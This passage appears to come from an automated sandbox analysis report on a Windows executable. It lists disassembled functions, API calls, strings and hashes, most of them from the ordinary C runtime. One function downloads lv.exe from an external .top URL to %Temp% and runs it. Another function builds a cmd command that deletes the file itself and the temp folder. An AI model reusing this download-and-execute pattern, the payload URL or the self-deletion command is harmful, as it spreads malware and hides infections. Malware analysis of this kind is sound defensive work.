                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA3B
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA4D
                                              • Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA5F
                                            • _free.LIBCMT ref: 0042CDF4
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            • _free.LIBCMT ref: 0042CE16
                                            • _free.LIBCMT ref: 0042CE2B
                                            • _free.LIBCMT ref: 0042CE36
                                            • _free.LIBCMT ref: 0042CE58
                                            • _free.LIBCMT ref: 0042CE6B
                                            • _free.LIBCMT ref: 0042CE79
                                            • _free.LIBCMT ref: 0042CE84
                                            • _free.LIBCMT ref: 0042CEBC
                                            • _free.LIBCMT ref: 0042CEC3
                                            • _free.LIBCMT ref: 0042CEE0
                                            • _free.LIBCMT ref: 0042CEF8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID: )D
                                            • API String ID: 161543041-4076570000
                                            • Opcode ID: 72cad83cb707e3760f5cc340b9f4f71e97d9eb79551cf2e0109430a87e05c2c2
                                            • Instruction ID: 17de8832ddb374441d57f5061042597303cc03b469bf3c66ee3829a99051513f
                                            • Opcode Fuzzy Hash: 72cad83cb707e3760f5cc340b9f4f71e97d9eb79551cf2e0109430a87e05c2c2
                                            • Instruction Fuzzy Hash: DF316C72700224DFEB20AA39E881B5F77E8EF40715F92485BE069D7251DB38F990CB18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExpandEnvironmentStringsW.KERNEL32(%Temp%\File.exe,00000000,00000208), ref: 0040EDD4
                                            • DeleteFileW.KERNEL32(00000000), ref: 0040EDDE
                                            • Sleep.KERNEL32(?), ref: 0040EE18
                                            • URLDownloadToFileW.URLMON(00000000,http://bojwfi01.top/download.php?file=lv.exe,00000000,00000000,00000000), ref: 0040EE2E
                                            • Sleep.KERNEL32(?), ref: 0040EE68
                                            • CreateFileW.KERNEL32(00000080,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040EE89
                                            • CloseHandle.KERNEL32(00000000), ref: 0040EE95
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040EEAD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Sleep$CloseCreateDeleteDownloadEnvironmentExecuteExpandHandleShellStrings
                                            • String ID: %Temp%\File.exe$http://bojwfi01.top/download.php?file=lv.exe$open
                                            • API String ID: 1827602710-3002260721
                                            • Opcode ID: 06e4115442e791c11a396ddc629e32d93b007718aa7663ea7e11aa6c47139a8a
                                            • Instruction ID: 0c381dc1caa1dcecdecca2c754032461df6aa4156044d7fa6adab5a0a5bd025b
                                            • Opcode Fuzzy Hash: 06e4115442e791c11a396ddc629e32d93b007718aa7663ea7e11aa6c47139a8a
                                            • Instruction Fuzzy Hash: 6821D5B0A84304B6F314A7A1DC4EF9A37A96B04705F50053AF251E90E1DBFC9548C76E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00418112
                                            • type_info::operator==.LIBVCRUNTIME ref: 00418139
                                            • ___TypeMatch.LIBVCRUNTIME ref: 00418245
                                            • IsInExceptionSpec.LIBVCRUNTIME ref: 00418320
                                            • _UnwindNestedFrames.LIBCMT ref: 004183A7
                                            • CallUnexpected.LIBVCRUNTIME ref: 004183C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2123188842-393685449
                                            • Opcode ID: fd7e0caea3e00f6aee01cd58af5106397b210f9a0e2b20e1780cbc901d9c2b8a
                                            • Instruction ID: 0281f0fe176ffed81ae8d673e133c63cb0f53b0eb1afd143364d120adbfa72d2
                                            • Opcode Fuzzy Hash: fd7e0caea3e00f6aee01cd58af5106397b210f9a0e2b20e1780cbc901d9c2b8a
                                            • Instruction Fuzzy Hash: 02C17871904209EFCF15DFA5C8819EEBBB5BF18314F18415FE8146B202DB39DAA1CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _free.LIBCMT ref: 00425BF7
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            • _free.LIBCMT ref: 00425C03
                                            • _free.LIBCMT ref: 00425C0E
                                            • _free.LIBCMT ref: 00425C19
                                            • _free.LIBCMT ref: 00425C24
                                            • _free.LIBCMT ref: 00425C2F
                                            • _free.LIBCMT ref: 00425C3A
                                            • _free.LIBCMT ref: 00425C45
                                            • _free.LIBCMT ref: 00425C50
                                            • _free.LIBCMT ref: 00425C5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 7dde9fdba9a4a9f0dd814b2f33e74bdbd18d422245b0bdf45c664078d5d674a0
                                            • Instruction ID: b90bb9bfc20cfabe93cc44a8396d028678ad5780f5c2d215824c22f92778cbc7
                                            • Opcode Fuzzy Hash: 7dde9fdba9a4a9f0dd814b2f33e74bdbd18d422245b0bdf45c664078d5d674a0
                                            • Instruction Fuzzy Hash: 2421C676A00118EFCF01EF95D881DEE7FB8EF48704B8141AAB515EB121DB39EA548B84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004318BF), ref: 00431F6C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DecodePointer
                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                            • API String ID: 3527080286-3064271455
                                            • Opcode ID: 62ec68b3863c4366ea564d45712310c1cb92d41fbd87b7e105d8dea48637823f
                                            • Instruction ID: 7c87a64087a321a1dce7a854cc06c944ef4979651dfc933242cd0044de019eaf
                                            • Opcode Fuzzy Hash: 62ec68b3863c4366ea564d45712310c1cb92d41fbd87b7e105d8dea48637823f
                                            • Instruction Fuzzy Hash: 71518E7090060ACBCF148F58EA4C1AEBBB0FB4D304F516147D691A6264C7FD8A2ACF5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00402C3C
                                            • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000208), ref: 00402C53
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00402CC1
                                            • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00402DF9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentExpandStrings$ExecuteFileModuleNameShell
                                            • String ID: & timeout 4 & del /f /q "$%ComSpec%$/c rd /s /q %Temp%\
                                            • API String ID: 112506409-2810557889
                                            • Opcode ID: 54596d0525a52ef080fda4aa49ef8aecfafc5ac37f7160843fd9d483d8d92172
                                            • Instruction ID: 10d3b32a02bf9cc6d91846d8616a5b81338913b4ecae8d650c28195380590b1b
                                            • Opcode Fuzzy Hash: 54596d0525a52ef080fda4aa49ef8aecfafc5ac37f7160843fd9d483d8d92172
                                            • Instruction Fuzzy Hash: CE513870A00108ABDB04DB64DE89BDD7775EF85304F208229F505AB6D4DB7D9A84CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: api-ms-$ext-ms-$f!@
                                            • API String ID: 0-2828910582
                                            • Opcode ID: 14c15d92a03c1bd5d14caaf599a631f2a7729f3b692d30db7766dcce4d7314a2
                                            • Instruction ID: 3fdf87e3b28de1d31ca978d63363a00e38af72533481e6e0b1591bac7ecb3151
                                            • Opcode Fuzzy Hash: 14c15d92a03c1bd5d14caaf599a631f2a7729f3b692d30db7766dcce4d7314a2
                                            • Instruction Fuzzy Hash: AF21D575F09630ABCB21AB64FC45B1B3758AF41770F640666EC06A7390D738EC0285DC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 004179F7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 004179FF
                                            • _ValidateLocalCookies.LIBCMT ref: 00417A88
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00417AB3
                                            • _ValidateLocalCookies.LIBCMT ref: 00417B08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 60d1f9988f94e84f7df48bea0a640f19cadad33a8ab1e9a08ecb32c9182d6e3d
                                            • Instruction ID: e8476ab28395cd8dc9f24e1359e818e6a09ef4f1306427bc3beaeb26a26fc396
                                            • Opcode Fuzzy Hash: 60d1f9988f94e84f7df48bea0a640f19cadad33a8ab1e9a08ecb32c9182d6e3d
                                            • Instruction Fuzzy Hash: C541E534A042099BCF10DF69C880ADEBBB1EF44358F14809BE8145B392D779AF95CF99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0042CAD1: _free.LIBCMT ref: 0042CAF6
                                            • _free.LIBCMT ref: 0042CB57
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            • _free.LIBCMT ref: 0042CB62
                                            • _free.LIBCMT ref: 0042CB6D
                                            • _free.LIBCMT ref: 0042CBC1
                                            • _free.LIBCMT ref: 0042CBCC
                                            • _free.LIBCMT ref: 0042CBD7
                                            • _free.LIBCMT ref: 0042CBE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 7ae0fb44a3ec765acb8fc691160abd3676b5497db462958d68dbc8fa1dcad0c2
                                            • Instruction ID: 1268741570c9608384a99cd3f017357ce27c762ae06beea27056b3e64a6ba217
                                            • Opcode Fuzzy Hash: 7ae0fb44a3ec765acb8fc691160abd3676b5497db462958d68dbc8fa1dcad0c2
                                            • Instruction Fuzzy Hash: 67118E317C0728EAD920F772EC87FCF7B9DDF44715F80081AB299E6052D6A8B4544744
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00426DED
                                            • __fassign.LIBCMT ref: 00426FCC
                                            • __fassign.LIBCMT ref: 00426FE9
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00427031
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00427071
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042711D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                            • String ID:
                                            • API String ID: 4031098158-0
                                            • Opcode ID: 20dff2612d617f5e7f2e0bfa3a2d3f5bad680edfda456df05f67a09ba0958eca
                                            • Instruction ID: ecf9f03be51d0e12f2ea23cea3a317be60150f7495603c0488c0cc1fbaa633c4
                                            • Opcode Fuzzy Hash: 20dff2612d617f5e7f2e0bfa3a2d3f5bad680edfda456df05f67a09ba0958eca
                                            • Instruction Fuzzy Hash: 16D1CE74E002689FCF15CFA8E9809EDBBB5FF49304F69006AE815BB341D6359D46CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16_free
                                            • String ID: a/p$am/pm
                                            • API String ID: 2936374016-3206640213
                                            • Opcode ID: 7e612ce1c941ce9bfa65e435f4a00cf330bfb5b66c261b615ca6e0b1e8a9f720
                                            • Instruction ID: d71ef341d30a07c85d5fdd8f906d2ae608712c58df87a86b343ff8292cc6debd
                                            • Opcode Fuzzy Hash: 7e612ce1c941ce9bfa65e435f4a00cf330bfb5b66c261b615ca6e0b1e8a9f720
                                            • Instruction Fuzzy Hash: 88C19E39900216DADB248F6AC985AFBB7B1FF49700F14415BED05AB350D2399DC2CB9E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetLastError.KERNEL32(?,?,00417CD7,00417533,00416C47), ref: 00417CEE
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00417CFC
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00417D15
                                            • SetLastError.KERNEL32(00000000,00417CD7,00417533,00416C47), ref: 00417D67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: af402e95c4f32853c39417d4f23ed08070f17a8f7a8ab274655b94e4e00823c1
                                            • Instruction ID: 7cbc4a43c9fdf46767f79dc5f5bd6ec7a6adcc6870b95efec285d8df81de69ce
                                            • Opcode Fuzzy Hash: af402e95c4f32853c39417d4f23ed08070f17a8f7a8ab274655b94e4e00823c1
                                            • Instruction Fuzzy Hash: CA01D83260C7195EA6352775BC85AF767B6EF16378320023FF620451F1EF594C81955C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Users\user\Desktop\file.exe$.D
                                            • API String ID: 0-3387770455
                                            • Opcode ID: 5c2764eb9db1d7ce962eaeb95f729e304ce6b8a39b4497cc30f40732ce21d5e4
                                            • Instruction ID: f5175974dc792da38283e94f59831f37aa4f9e6f53d6333639dff523f34ac6be
                                            • Opcode Fuzzy Hash: 5c2764eb9db1d7ce962eaeb95f729e304ce6b8a39b4497cc30f40732ce21d5e4
                                            • Instruction Fuzzy Hash: B1318671B00225EBDB21DF99AC8599FBBB8EB85711B9100ABF404D7310D7B89B41CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetLastError.KERNEL32(f!@,00000000,?,0041D330,00000000,?,0041D3A8,00000000,00000000,00000000,00000000,00000000,?,0040237C), ref: 00425E55
                                            • _free.LIBCMT ref: 00425EB2
                                            • _free.LIBCMT ref: 00425EE8
                                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 00425EF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast_free
                                            • String ID: f!@
                                            • API String ID: 2283115069-1230519027
                                            • Opcode ID: bbd2ae3955cfcc92088228961875a874c857f1f7b4632151b93e34bf203891f6
                                            • Instruction ID: f22f4f3a20eda36a27369962ac204486df73deed73b473d0e60572793873c984
                                            • Opcode Fuzzy Hash: bbd2ae3955cfcc92088228961875a874c857f1f7b4632151b93e34bf203891f6
                                            • Instruction Fuzzy Hash: 531108323009306ADA11277A7C85E2B2599ABD1B7EBE6023BF524C22E1DEB8CD01411C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: api-ms-
                                            • API String ID: 0-2084034818
                                            • Opcode ID: 48670829bf43f0a4152d54f27c12e5ff13952888efe092a4fd6e4e2af4b1cc9f
                                            • Instruction ID: 21d1bef25c3c2f733d9b8903b7e08a68be804b5686698e82e59003254140fedd
                                            • Opcode Fuzzy Hash: 48670829bf43f0a4152d54f27c12e5ff13952888efe092a4fd6e4e2af4b1cc9f
                                            • Instruction Fuzzy Hash: 7F11C832E01721ABCB318B28AC44B9B3754EF157A0B24052AE902F73D1DF34DD4196ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004230E8,?,?,004230B0,?,?,?), ref: 00423108
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042311B
                                            • FreeLibrary.KERNEL32(00000000,?,?,004230E8,?,?,004230B0,?,?,?), ref: 0042313E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: c30e52b87ce1e0d35694b10c989a13f1a911aa3a2d172dc758f4fb9de2a2296e
                                            • Instruction ID: 3fd44a570d3d3aa30b4c60add8ce0c5949b292e2d20ee8f27edad6efc8aac179
                                            • Opcode Fuzzy Hash: c30e52b87ce1e0d35694b10c989a13f1a911aa3a2d172dc758f4fb9de2a2296e
                                            • Instruction Fuzzy Hash: 57F08230A01519FBDB119F50DD0AB9EFB79EB00756F105061B500A1160CB788F00DA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0042F4E1,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0042F2C8
                                            • __alloca_probe_16.LIBCMT ref: 0042F37E
                                            • __alloca_probe_16.LIBCMT ref: 0042F414
                                            • __freea.LIBCMT ref: 0042F47F
                                            • __freea.LIBCMT ref: 0042F48B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __alloca_probe_16__freea$Info
                                            • String ID:
                                            • API String ID: 2330168043-0
                                            • Opcode ID: 8b9c0f20efd9c1db0f682dd2dc1082fd2d9978251ac334b395d9c6ccabb00e55
                                            • Instruction ID: 49deb8af6b10edf06c3606a0c4022d6d61da754629e78d81dd69d19ccdab76c5
                                            • Opcode Fuzzy Hash: 8b9c0f20efd9c1db0f682dd2dc1082fd2d9978251ac334b395d9c6ccabb00e55
                                            • Instruction Fuzzy Hash: F8810431F002269BDF20DEA5E841AEF7BB59F59314FD4007BEC00A7240D7698C0987A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00430AC4
                                            • __alloca_probe_16.LIBCMT ref: 00430B8A
                                            • __freea.LIBCMT ref: 00430BF6
                                              • Part of subcall function 00425373: RtlAllocateHeap.NTDLL(00000000,00416318,004021DA,?,0041732F,004021DC,004021DA,?,f!@,?,00416242,00416318,004021DE,004021DA,004021DA,004021DA), ref: 004253A5
                                            • __freea.LIBCMT ref: 00430BFF
                                            • __freea.LIBCMT ref: 00430C22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: f5e10dcb4e1b5180149dcfde1ee7066194664871545ea3846a539fd62bd0da3b
                                            • Instruction ID: aae3ed12384742570996b07145b7cc33cb17a9f70ae160d4cad1b6566b2d129e
                                            • Opcode Fuzzy Hash: f5e10dcb4e1b5180149dcfde1ee7066194664871545ea3846a539fd62bd0da3b
                                            • Instruction Fuzzy Hash: 7D513672600216AFEF245F95DC51FBF7BA9DF48758F14122AFD0497250E778EC418298
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _free.LIBCMT ref: 0042CA80
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            • _free.LIBCMT ref: 0042CA92
                                            • _free.LIBCMT ref: 0042CAA4
                                            • _free.LIBCMT ref: 0042CAB6
                                            • _free.LIBCMT ref: 0042CAC8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 8d7711ed1f3d710bc71b8934c021647d63756fe8dce82523900df8435153359a
                                            • Instruction ID: 3e30a90eec24ba82b40bb39c08b55b1911a2b8f70f3ac1706e663f63c14e5b6a
                                            • Opcode Fuzzy Hash: 8d7711ed1f3d710bc71b8934c021647d63756fe8dce82523900df8435153359a
                                            • Instruction Fuzzy Hash: CCF03C3274422CAB8A20EB59F5C2E1E77DDEA407157D50C0AF019D7A01C628FC808A5C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: false$null$true
                                            • API String ID: 0-2913297407
                                            • Opcode ID: cf527f57543795860667fa2d1ff9add848aa0be06ad6aa732714e453a202084c
                                            • Instruction ID: 2627b525dfe0767b958972f9fa426b8e5079c283e1f8cb494701fc8a6cc70701
                                            • Opcode Fuzzy Hash: cf527f57543795860667fa2d1ff9add848aa0be06ad6aa732714e453a202084c
                                            • Instruction Fuzzy Hash: FF515AB2B002041BE7206B25E84679777949F95365F04426BEC488B2D2F7FAD8D48699
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 4a51762b48c1edabe2c0848022661543819ff70b16c697e639a73c78acec0c79
                                            • Instruction ID: d943f78719edc19706b6cdc1e86aa1519e879c04837a2d813e89a83390d0512f
                                            • Opcode Fuzzy Hash: 4a51762b48c1edabe2c0848022661543819ff70b16c697e639a73c78acec0c79
                                            • Instruction Fuzzy Hash: 29B13431B002659FDB11DF28D8817BEBBA5EF55300F5681ABD8519B342D63C9D02CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: aefb51fe6224af82109526f6ac7ce57d839f1fd428b54d264c825180a72973e6
                                            • Instruction ID: f3e96f547d38daad7089fa0d9b8ca550fdb55ab944dabffe9782127b6fce0068
                                            • Opcode Fuzzy Hash: aefb51fe6224af82109526f6ac7ce57d839f1fd428b54d264c825180a72973e6
                                            • Instruction Fuzzy Hash: B251BA72608706AFDB298F11D941BEAB7F4EF04314F2444AFE81146691E739ACD1CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08eb012a960c6c7adae0bbf3c245a16046c89a631ac914cdcc819b03dd376a4e
                                            • Instruction ID: 73dca2ba3f8e1879c6b02ebd43662e10590afcf8ec5fcb7453fdc533bd91696c
                                            • Opcode Fuzzy Hash: 08eb012a960c6c7adae0bbf3c245a16046c89a631ac914cdcc819b03dd376a4e
                                            • Instruction Fuzzy Hash: 3D4127B1B00324EFD714DF38DD01B9ABBA8EB48710F10466FF851DB381D2B999508795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _free.LIBCMT ref: 004315BA
                                            • _free.LIBCMT ref: 004315E3
                                            • SetEndOfFile.KERNEL32(00000000,0042FA9F,00000000,00428221,?,?,?,?,?,?,?,0042FA9F,00428221,00000000), ref: 00431615
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0042FA9F,00428221,00000000,?,?,?,?,00000000), ref: 00431631
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFileLast
                                            • String ID:
                                            • API String ID: 1547350101-0
